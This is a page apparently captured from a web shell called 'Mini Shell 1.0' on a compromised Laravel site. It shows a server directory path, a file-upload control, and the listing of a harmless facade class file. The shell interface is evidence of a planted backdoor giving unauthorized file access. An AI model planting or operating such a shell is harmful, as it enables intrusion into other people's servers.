HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/genealabs/laravel-socialiter/src/Facades/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/genealabs/laravel-socialiter/src/Facades/Socialiter.php
<?php

namespace GeneaLabs\LaravelSocialiter\Facades;

use Illuminate\Support\Facades\Facade;

class Socialiter extends Facade
{
    protected static function getFacadeAccessor()
    {
        return 'socialiter';
    }
}